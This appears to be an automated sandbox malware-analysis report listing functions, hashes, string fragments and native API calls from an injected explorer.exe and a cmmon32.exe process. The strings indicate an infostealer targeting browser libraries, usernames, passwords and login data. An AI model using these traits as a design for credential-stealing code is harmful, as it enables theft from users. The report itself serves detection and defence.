Instruction Fuzzy Hash: 6FC1B274618A194FC798EF28D55ABAAB3E1FB98300F514329A44EC7254DF30FA12CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 102C62F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

nspr, xrefs: 102C64D4
dragon_s.dll, xrefs: 102C6614
l, xrefs: 102C64E2
4.dl, xrefs: 102C64DB
opera_browser.dll, xrefs: 102C6629
cli., xrefs: 102C6327
sspi, xrefs: 102C6320
dll, xrefs: 102C632E

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 2d2d9bb62976ebca2ac5fbc41f585aa0bc94ad4787752e453f86156cb6c2060b
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: F7C1B174618A194FC798EF28D55ABAAB3E1FB98300F51432DA44EC7254DF30FA12CB85

Uniqueness

Uniqueness Score: -1.00%

Function 102C7CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 102C7D9E
Pass, xrefs: 102C7D97
2, xrefs: 102C7DE1
name, xrefs: 102C7DB2
L: , xrefs: 102C7D66
UR, xrefs: 102C7D5F
User, xrefs: 102C7DAB

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 638420454f950c8333d465b05a6a849f6a6f52065eb2c4f78dbd8911c1ddd388
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 92A1CD706187488BDB18DFA8D445BEEB7E1FF88300F40862DE48AD7242EF7099558B89

Uniqueness

Uniqueness Score: -1.00%

Function 102C7CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 102C7D9E
Pass, xrefs: 102C7D97
2, xrefs: 102C7DE1
name, xrefs: 102C7DB2
L: , xrefs: 102C7D66
UR, xrefs: 102C7D5F
User, xrefs: 102C7DAB

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 443e9a6ff27eace3084445668b35eb223b4f066e39f577c8471c7bc8c6b0d060
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: B091AF706187488BDB18DFA8D545BEEB7E1FF88300F40862EE48AD7242EF709555CB89

Uniqueness

Uniqueness Score: -1.00%

Function 102C7352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 102C73B0
v, xrefs: 102C74A0
n, xrefs: 102C73E7
e, xrefs: 102C748E
, xrefs: 102C747C

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 7289b9ff417d8b5496241d7a0b284cdf3ce3d8011f20acadf9816844e0e9dd1f
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: FE71B131618B498FD758EFA8C4857AAB7F4FF98304F00062EE44AC7261EF70E9558B81

Uniqueness

Uniqueness Score: -1.00%

Function 102C2C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

dll, xrefs: 102C2C9E
ole3, xrefs: 102C2C5D
2.dl, xrefs: 102C2C64
shel, xrefs: 102C2C90
l32., xrefs: 102C2C97

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: ecbcf98409761686584466ea338c097cda62017b26498e2568099d0c770682c5
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 82514CB4918B4C8BDB54DFA4C045BEEB7F1FF58300F40462EA49AE7214EF30A5558B89

Uniqueness

Uniqueness Score: -1.00%

Function 102C386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 102C39E0
vers, xrefs: 102C38E4
ion., xrefs: 102C38EC
dll, xrefs: 102C38F4
4, xrefs: 102C39E9

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 7b0a7b50e061b1785a449b13081e4014d593e3ce1e08c5b9bab276b7021292fe
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 88416434618B898FCBA5EF2499457EB73E4FB94301F51472E988EC7240DF30D6558B82

Uniqueness

Uniqueness Score: -1.00%

Function 102C54B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 102C54DA
user, xrefs: 102C54D3
cli., xrefs: 102C5515
sspi, xrefs: 102C550E
dll, xrefs: 102C551C

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: b0cf70992e28bd68f1fd936283aa385252386a6ddb6e94f3dc2a0898f4e7af67
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 55418070A18E1D8FCB84EF68C1957AD73E6FB58340F91036AE80ED7210DA71D9908BC6

Uniqueness

Uniqueness Score: -1.00%

Function 102C3432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 102C3537
.dll, xrefs: 102C353F
h, xrefs: 102C351F
kern, xrefs: 102C352A

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: e83ba60c966e59c689b91983bed4a90623c34437e7cdd1f6cd5a531401e1934d
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F24182B0608B494FD7A9DF28C0843AAB7E1FB98344F604B2E949EC3255DB70D955CB41

Uniqueness

Uniqueness Score: -1.00%

Function 102CA0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 102CA154
f fr, xrefs: 102CA13D
, xrefs: 102CA184
om:, xrefs: 102CA146

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: e9250999e7c9b4a47d5040d08af511832755855fa04d67f12e09946365b9de18
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BB31DE74508B886FC75ADB28C485BDAB7D4FB84300F504A1EE49BC7292EE31A54ACA43

Uniqueness

Uniqueness Score: -1.00%

Function 102CA0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 102CA154
f fr, xrefs: 102CA13D
, xrefs: 102CA184
om:, xrefs: 102CA146

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 2f23a00e08a57fa335474d7e34c91145c5b6fcc63b12558fd2927574de1042b4
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 8131EE75508B486FD75ADB28C485BEAB7D4FB94300F504A1EE49BC3296EE30A54ACE43

Uniqueness

Uniqueness Score: -1.00%

Function 102C5FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 102C5FFE
me_c, xrefs: 102C5FEE
hild, xrefs: 102C5FF6
chro, xrefs: 102C6023

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: e30a0f1efdd030105bb30795d1f6cea4760eed34c2dc772135d67eca5150039f
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 59318D34218B484FC784EF288595BAAB7E1FBD8300F90066EA84ECB214DF30E9158B52

Uniqueness

Uniqueness Score: -1.00%

Function 102C5FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 102C5FFE
me_c, xrefs: 102C5FEE
hild, xrefs: 102C5FF6
chro, xrefs: 102C6023

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 3ae146240e759b12eea1e333016d58f0ad8027c88b5c1e6d241e8fb84b395615
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: DB319C30218B484FC784DF288595BAAB7E1FFD8300F90072DA84ECB254DF30E9158B52

Uniqueness

Uniqueness Score: -1.00%

Function 102C88C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 102C8902
nt: , xrefs: 102C891E
User-Agent: , xrefs: 102C8935, 102C8948
urlmon.dll, xrefs: 102C8959

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 2a8084a3190422bd4a7f683f6cb600330d8111f922d3dfb4eb9b9d75984ee228
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 3631DF31614A0D8BCB44EFA8C885BEEB7E4FB58214F40422AE44ED7240DE789645CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 102C88BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 102C8902
nt: , xrefs: 102C891E
User-Agent: , xrefs: 102C8935, 102C8948
urlmon.dll, xrefs: 102C8959

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: e995039d232cb10c79ac66528009193b8809ed2844d3549434a9cc5cde42c407
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2221E470A10A4D8BCF45EFA8C985BEDBBE4FF58204F40432AE45AD7240DF749615CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 102C9E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 102C9F03
., xrefs: 102C9F1F
t, xrefs: 102C9EF4
l, xrefs: 102C9F26

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 70387f20063abb8d498f92aabcc2d7ab43ec885a7fda0166506714511442e8e8
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 89216D74A24A4D9BDB48EFA8D445BEDBBF1FB58314F50462EE009D3600DB74A5618B84

Uniqueness

Uniqueness Score: -1.00%

Function 102C9E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 102C9F03
., xrefs: 102C9F1F
t, xrefs: 102C9EF4
l, xrefs: 102C9F26

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 6e408d94ca3e3e0c3d5fefd8c96e3a5a7f03d9319f5b9ffff22664ac3a7897b9
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: D3215E74A14A4D9FDB44EFA8D045BEDBAF1FB58314F50462EE009D3610DB74A5518B84

Uniqueness

Uniqueness Score: -1.00%

Function 102C9FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 102CA022
auth, xrefs: 102CA02F
user, xrefs: 102CA015
logi, xrefs: 102CA03C

Memory Dump Source

Source File: 00000003.00000002.3811930169.0000000010260000.00000040.00000001.00040000.00000000.sdmp, Offset: 10260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10260000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 54570a126a34d14dfd2bb04bc7ffe3437b4a2ce4b3e6102219ded553380f3ce7
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 1B21CD30614B0D8BCB45CF9D98817DEB7E1EF88384F00461AE80AEB244D7B0E924CBC6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exePID: 5656, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	597
Total number of Limit Nodes:	82

Executed Functions

Function 0041A48A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5

Strings

}KA, xrefs: 0041A484
PMA, xrefs: 0041A4AC, 0041A4B4

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: Close
String ID: PMA$}KA
API String ID: 3535843008-163805728
Opcode ID: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
Instruction ID: 27b2774977dc75779a16d9e6a36301c1ab18ded06c0ae9908cf23c73c8696345
Opcode Fuzzy Hash: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
Instruction Fuzzy Hash: B8E0D8726001187ED614EBE8DC45EEBB76CEF80754F15405BF50C5B142C531B1208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD

Strings

.z`, xrefs: 0041A39D, 0041A3A8

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A40A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455

Strings

1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA
API String ID: 2738559852-3517284412
Opcode ID: a8c31c965dde8a16d6a61a5e189a38e7ae4e22b2e4c6ed7b0e628d5b7b97c746
Instruction ID: fc01f0a9a7a463296cdf2ddec04be91dd5259237522f72ac8338e5fe6fb0ed92
Opcode Fuzzy Hash: a8c31c965dde8a16d6a61a5e189a38e7ae4e22b2e4c6ed7b0e628d5b7b97c746
Instruction Fuzzy Hash: F0F0E7B2200108ABCB08DF89CC80DEB77A9EF8C714F15824DBA0D97250C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A410 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455

Strings

1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA
API String ID: 2738559852-3517284412
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5

Strings

PMA, xrefs: 0041A4AC, 0041A4B4

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: Close
String ID: PMA
API String ID: 3535843008-3622942700
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 0041A579

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e7732ef2b78dfb3062562d0d57d351e69e2af1cbbe413eece3aa4b3ab6b2d1e0
Instruction ID: f8e3cdc54e06309fc8146fb881595e2c36c995c32cb6fa008751c380793c3acf
Opcode Fuzzy Hash: e7732ef2b78dfb3062562d0d57d351e69e2af1cbbe413eece3aa4b3ab6b2d1e0
Instruction Fuzzy Hash: 5BF0F8B6210208AFDB14DF89CC81EEB77A9AF8C654F158149FA4997242C634F911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 0041A579

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 043E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2C7A

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d6ceb3d0b47a98cae89a706c37301fbaf0125d21619eb67ec4c24b9baa23de9
Instruction ID: 8e9e6080a58383095d2c871ba99339b8337ce188a5bf49900125261b0df84114
Opcode Fuzzy Hash: 4d6ceb3d0b47a98cae89a706c37301fbaf0125d21619eb67ec4c24b9baa23de9
Instruction Fuzzy Hash: 4C90023520148802F918715C880474A0005CBD1315F59E411A5425658D8795D9A17121

Uniqueness

Uniqueness Score: -1.00%

Function 043E2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2C6A

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47b4bd9afa2a4b6d5236288f118cf8a449c329b72040a0b93fc020f13a75cb2c
Instruction ID: fb94ac27d64046193db892d4e2aeeb816a4f5eaa69af6ffa3e76fb36bbfe2402
Opcode Fuzzy Hash: 47b4bd9afa2a4b6d5236288f118cf8a449c329b72040a0b93fc020f13a75cb2c
Instruction Fuzzy Hash: DD90023520140842F908715C4804B460005CBE1315F55E016A1125654D8715D9617521

Uniqueness

Uniqueness Score: -1.00%

Function 043E2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2CAA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be7cc515923079eace1a7cb4446c0ea002e20c4ddb329a397a95f46d95026164
Instruction ID: 3821b428a0aa569f08abfa2458310f87253af5cd4b7cb73d86ac35a2ab2adb9b
